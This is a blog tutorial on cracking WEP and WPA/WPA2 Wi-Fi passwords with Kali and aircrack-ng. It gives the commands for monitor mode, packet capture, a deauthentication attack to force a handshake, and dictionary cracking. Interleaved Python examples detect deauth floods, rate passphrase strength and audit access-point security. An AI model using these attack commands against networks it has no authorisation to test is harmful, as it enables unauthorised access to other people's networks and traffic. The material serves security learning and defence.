Cracking WEP & WPA/WPA2 Wi-Fi Passwords

Prateek Parashar
4 min read · Feb 13, 2021

Wi-Fi has several security standards: WEP, WPA, WPA2 and, not yet widely deployed, WPA3. The standard a network uses determines how strong its protection is and how easily its password can be cracked. If you notice that a Wi-Fi network uses WEP, be happy, because it is certainly crackable; if it uses WPA or WPA2 we need to do some extra work, but it can still be cracked.

This blog is written as a part of the Master Certificate in Cyber Security that I am pursuing from HackerU.

The WPA/WPA2 attacks are brute-force attacks, or more precisely dictionary attacks, so we should also know how long each type of password takes to crack.

This also depends on your GPU (if you are using one) and on the resources allocated to the Kali virtual machine.

We will start with WPA/WPA2 cracking and then move on to WEP cracking.

Let's get on to cracking.

Pre-requisites

  1. Kali Linux
  2. Aircrack-ng suite (pre-installed in Kali)
  3. Wi-Fi adapter (monitor mode compatible)

Process

Step 1 - Enabling monitor mode

Enable monitor mode on your wireless adapter so it can monitor all the wireless traffic.

Checking if the adapter is connected:

iwconfig

Changing the mode from managed to monitor:

airmon-ng start wlan0

On current Kali releases airmon-ng usually creates a separate monitor interface named wlan0mon; if it does, use that name in place of wlan0 in the commands that follow.

WPA/WPA2

Step 2- Monitor wireless connection and capture packets

Start airodump-ng to monitor all the wireless connections and single out the target.

Selecting the WPA2 target

airodump-ng wlan0

STEP 3 - Dumping data packets & capturing the handshake

airodump-ng wlan0 --bssid <target_mac_address> -c 1 --write <filename>

Capturing data packets from the network ASUS_X00TD and writing them to a file named asus1. Here --bssid is the target's MAC address and -c is the channel number.

Now we have to wait for a device to connect to the target so we can capture the handshake, which we will use to crack the password. If no new device connects to the target, we can disconnect the existing clients by performing a deauthentication attack. Open a new terminal and run the following command for the de-auth attack.

aireplay-ng -0 1 -a <target_MAC_address> -c <client_MAC_address> wlan0

  • -0 means deauthentication
  • 1 is the number of deauths to send (you can send more if you wish)
  • -a is the target's MAC address (BSSID) and -c is the client to disconnect

Capturing the handshake
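As an added example (not part of the original post), here is what the deauthentication step looks like from the defender's side: a small detector that parses the 802.11 management-frame header and flags a BSSID that receives a burst of deauth/disassoc frames, which is exactly the signature a wireless IDS looks for. The MAC addresses, timestamps, reason codes and frames below are constructed for the example; a real deployment would feed it frames from a monitor-mode capture with the radiotap header stripped.

```python
from collections import defaultdict

MGMT_TYPE = 0          # 802.11 frame type 0 = management
BEACON_SUBTYPE = 8     # management subtype 8  = beacon
DISASSOC_SUBTYPE = 10  # management subtype 10 = disassociation
DEAUTH_SUBTYPE = 12    # management subtype 12 = deauthentication


def _mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def _mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes) -> dict:
    """Decode the fixed 24-byte 802.11 MAC header of a management frame.

    Layout: frame control (2) | duration (2) | addr1 (6) | addr2 (6) |
    addr3 (6) | sequence control (2) | body. In management frames addr3 is
    the BSSID; deauth/disassoc bodies start with a 2-byte reason code.
    """
    if len(frame) < 24:
        raise ValueError("frame shorter than the 24-byte 802.11 MAC header")
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3       # bits 2-3 of the first frame-control byte
    subtype = (fc0 >> 4) & 0xF     # bits 4-7
    info = {
        "type": ftype,
        "subtype": subtype,
        "dst": _mac_str(frame[4:10]),
        "src": _mac_str(frame[10:16]),
        "bssid": _mac_str(frame[16:22]),
        "reason": None,
    }
    if ftype == MGMT_TYPE and subtype in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE) and len(frame) >= 26:
        info["reason"] = int.from_bytes(frame[24:26], "little")
    return info


def sample_frame(subtype: int, dst: str, src: str, bssid: str, seq: int, body: bytes = b"") -> bytes:
    """Build a constructed management frame for the sample capture below."""
    frame_control = bytes([(subtype << 4) | (MGMT_TYPE << 2), 0x00])
    duration = (0).to_bytes(2, "little")
    seq_ctrl = ((seq & 0xFFF) << 4).to_bytes(2, "little")
    return frame_control + duration + _mac_bytes(dst) + _mac_bytes(src) + _mac_bytes(bssid) + seq_ctrl + body


def detect_deauth_flood(frames, window_s: float = 10.0, threshold: int = 5) -> dict:
    """Return {bssid: peak_count} for BSSIDs with more than `threshold`
    deauth/disassoc frames inside any `window_s`-second sliding window.

    `frames` is an iterable of (timestamp_seconds, raw_frame_bytes).
    """
    stamps = defaultdict(list)
    for ts, raw in frames:
        hdr = parse_mgmt_frame(raw)
        if hdr["type"] == MGMT_TYPE and hdr["subtype"] in (DEAUTH_SUBTYPE, DISASSOC_SUBTYPE):
            stamps[hdr["bssid"]].append(ts)
    alerts = {}
    for bssid, times in stamps.items():
        times.sort()
        peak = start = 0
        for end, t in enumerate(times):
            while t - times[start] > window_s:   # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            alerts[bssid] = peak
    return alerts


# Constructed sample capture: one beacon, a 20-frame deauth burst against a
# client of AP, and one ordinary "station leaving" deauth on another BSSID.
AP = "02:00:00:00:aa:01"        # constructed BSSID
CLIENT = "02:00:00:00:cc:01"    # constructed client MAC
OTHER_AP = "02:00:00:00:aa:02"
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3 = (7).to_bytes(2, "little")   # "class 3 frame from non-associated STA"
REASON_LEAVING = (3).to_bytes(2, "little")  # "station is leaving"

SAMPLE_CAPTURE = [(0.0, sample_frame(BEACON_SUBTYPE, BROADCAST, AP, AP, 1))]
SAMPLE_CAPTURE += [
    (1.0 + i * 0.05, sample_frame(DEAUTH_SUBTYPE, CLIENT, AP, AP, 100 + i, REASON_CLASS3))
    for i in range(20)
]
SAMPLE_CAPTURE.append((5.0, sample_frame(DEAUTH_SUBTYPE, OTHER_AP, CLIENT, OTHER_AP, 7, REASON_LEAVING)))

if __name__ == "__main__":
    for bssid, count in detect_deauth_flood(SAMPLE_CAPTURE).items():
        print(f"ALERT deauth flood on {bssid}: {count} frames in a 10 s window")
```

The single "station leaving" deauth on the second BSSID is normal traffic and is not reported; only the burst crosses the threshold. Tune window and threshold to your environment: busy enterprise networks see a steady trickle of legitimate deauth/disassoc frames, but dozens within a few seconds against one BSSID is the pattern that precedes a handshake capture.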

Step 4 - Cracking the WPA/WPA2 password

The .cap file that we are going to use

Using the wordlist rockyou.txt to perform a brute-force (dictionary) attack; as we can see, the password is cracked, and it is liverpool.

aircrack-ng <.cap_file> -w <wordlist_location/wordlist.txt>

If you want to create a custom wordlist you can use the CUPP tool to do so.
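Why does liverpool fall to rockyou.txt in seconds while a long passphrase does not? The following added example (my own illustration, not code from this post or from aircrack-ng) audits a candidate WPA/WPA2 passphrase against a constructed mini wordlist and estimates worst-case brute-force time at an assumed rate of 500,000 WPA2 guesses per second, roughly what a single mid-range GPU manages; adjust the rate to your own hardware.

```python
import string

# Constructed stand-in for rockyou.txt; the real list has millions of entries.
SAMPLE_WORDLIST = ["123456", "password", "liverpool", "qwerty", "iloveyou"]

# Assumed rate: WPA2 PBKDF2 guesses per second for a single mid-range GPU.
ASSUMED_GPU_RATE = 500_000.0
YEAR = 365 * 86400

# Character classes an attacker must include once a passphrase uses them.
CHAR_CLASSES = {
    "lower": (string.ascii_lowercase, 26),
    "upper": (string.ascii_uppercase, 26),
    "digit": (string.digits, 10),
    "symbol": (string.punctuation + " ", 33),
}


def charset_size(passphrase: str) -> int:
    """Size of the smallest standard alphabet covering every character used."""
    return sum(n for chars, n in CHAR_CLASSES.values() if any(c in chars for c in passphrase))


def brute_force_seconds(passphrase: str, guesses_per_second: float) -> float:
    """Worst-case time to exhaust every string of this length over this alphabet."""
    return charset_size(passphrase) ** len(passphrase) / guesses_per_second


def human_time(seconds: float) -> str:
    for unit, size in (("years", YEAR), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.6f} seconds"


def audit_passphrase(passphrase: str, wordlist=SAMPLE_WORDLIST,
                     guesses_per_second: float = ASSUMED_GPU_RATE) -> dict:
    """Classify a WPA/WPA2 passphrase the way the attacks above would meet it."""
    if not 8 <= len(passphrase) <= 63:
        return {"verdict": "invalid", "detail": "WPA/WPA2 passphrases are 8 to 63 characters"}
    # Case-folded: rule-based cracking tries capitalisation variants of each word.
    folded = [w.lower() for w in wordlist]
    if passphrase.lower() in folded:
        guesses = folded.index(passphrase.lower()) + 1
        seconds = guesses / guesses_per_second
        return {"verdict": "dictionary", "guesses": guesses, "seconds": seconds,
                "detail": f"in wordlist at position {guesses}, cracked in {human_time(seconds)}"}
    guesses = charset_size(passphrase) ** len(passphrase)
    seconds = guesses / guesses_per_second
    verdict = "brute-forceable" if seconds < YEAR else "strong"
    return {"verdict": verdict, "guesses": guesses, "seconds": seconds,
            "detail": f"{charset_size(passphrase)}^{len(passphrase)} candidates, "
                      f"{human_time(seconds)} worst case"}


if __name__ == "__main__":
    for pw in ["liverpool", "zqxjkvwpb", "Liverp00l!", "correct horse battery staple"]:
        r = audit_passphrase(pw)
        print(f"{pw!r:32} {r['verdict']:16} {r['detail']}")
```

Treat "strong" as an upper bound: the estimator only does plain wordlist matches, while hashcat-style rule sets also reach mangled variants such as Liverp00l!, so a dictionary word with a few substitutions is still a dictionary word. The practical defence the numbers point to is a long passphrase of several unrelated words, which keeps the search space out of reach even at GPU speeds.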

Now let's crack some WEP passwords, which is like child's play.

WEP

STEP 1 is the same as in the WPA/WPA2 process.

STEP 2 - Dumping data packets

Finding a WEP-secured Wi-Fi
Dumping data packets

airodump-ng wlan0 --bssid <target_MAC_address> -c <channel> --write <filename>

STEP 3 - Cracking the password

See how easily we have cracked the WEP password, which is 6MK”q.

aircrack-ng <file.cap>
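Before worrying about cracking, a network owner can simply inventory which of their own access points still run WEP, open or WPA/TKIP. The added example below (not from the article) reads the CSV that airodump-ng writes alongside the .cap when you pass --write, in the column layout I assume for that output (access points first, a blank line, then the station section; check the header against your own file), and ranks each access point by how exposed it is. The sample rows are constructed.

```python
import csv

# Constructed sample in the column layout assumed for airodump-ng's <prefix>-01.csv.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:AA:01, 2021-02-13 10:00:01, 2021-02-13 10:05:12,  1,  54, WEP , WEP , OPN,  -40,  120,  9876,   0.  0.  0.  0,   8, LegacyAP,
02:00:00:00:AA:02, 2021-02-13 10:00:01, 2021-02-13 10:05:12,  6, 130, WPA2, CCMP, PSK,  -55,  300,     0,   0.  0.  0.  0,  10, ASUS_X00TD,
02:00:00:00:AA:03, 2021-02-13 10:00:03, 2021-02-13 10:05:10, 11,  54, OPN ,     ,    ,  -70,   80,     0,   0.  0.  0.  0,   8, CafeWiFi,
02:00:00:00:AA:04, 2021-02-13 10:00:03, 2021-02-13 10:05:10, 11,  54, WPA , TKIP, PSK,  -72,   60,     0,   0.  0.  0.  0,   5, OldAP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:CC:01, 2021-02-13 10:00:05, 2021-02-13 10:05:11,  -50,   400, 02:00:00:00:AA:02,
"""


def parse_airodump_csv(text: str) -> list:
    """Return the access-point section as a list of dicts keyed by header name."""
    header, rows = None, []
    for row in csv.reader(text.splitlines(), skipinitialspace=True):
        cells = [c.strip() for c in row]
        if not any(cells):                 # blank line: end of the AP section
            if header:
                break
            continue
        if cells[0] == "Station MAC":      # safety net if the blank line is missing
            break
        if cells[0] == "BSSID":
            header = cells
            continue
        if header:
            rows.append(dict(zip(header, cells)))
    return rows


def classify(ap: dict) -> tuple:
    """Map an AP row to (severity, reason) from a defender's point of view."""
    priv = ap["Privacy"].upper()
    cipher = ap["Cipher"].upper()
    auth = ap["Authentication"].upper()
    if priv in ("", "OPN"):
        return "critical", "open network, all traffic readable"
    if "WEP" in priv:
        return "critical", f"WEP, key recoverable from captured IVs ({ap['# IV']} seen so far)"
    if "WPA3" in priv:
        return "ok", "WPA3"
    if "TKIP" in cipher or priv == "WPA":
        return "high", "WPA/TKIP, deprecated cipher; move to WPA2-CCMP or WPA3"
    if auth == "PSK":
        return "medium", "WPA2-PSK, only as strong as the passphrase once a handshake is captured"
    return "low", f"{priv} with {cipher}/{auth}"


def audit(text: str) -> list:
    """Rank every AP in the capture, worst first."""
    order = {"critical": 0, "high": 1, "medium": 2, "low": 3, "ok": 4}
    report = [(ap["ESSID"], ap["BSSID"], *classify(ap)) for ap in parse_airodump_csv(text)]
    return sorted(report, key=lambda r: order[r[2]])


if __name__ == "__main__":
    for essid, bssid, sev, why in audit(SAMPLE_CSV):
        print(f"{sev:8} {essid:12} {bssid}  {why}")
```

Run it against the CSV from your own survey and the output is a remediation list: WEP and open networks are retired or re-keyed first, WPA/TKIP is moved to WPA2-CCMP or WPA3, and what remains on WPA2-PSK gets the passphrase treatment from the previous section.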

Hope you found this helpful. If you liked this article or if it helped you in any way, please leave some claps. And I wouldn’t mind 50 of them ;)


Prateek Parashar

Computer Science graduate who is passionate about CyberSecurity. An IoT and Crypto enthusiast.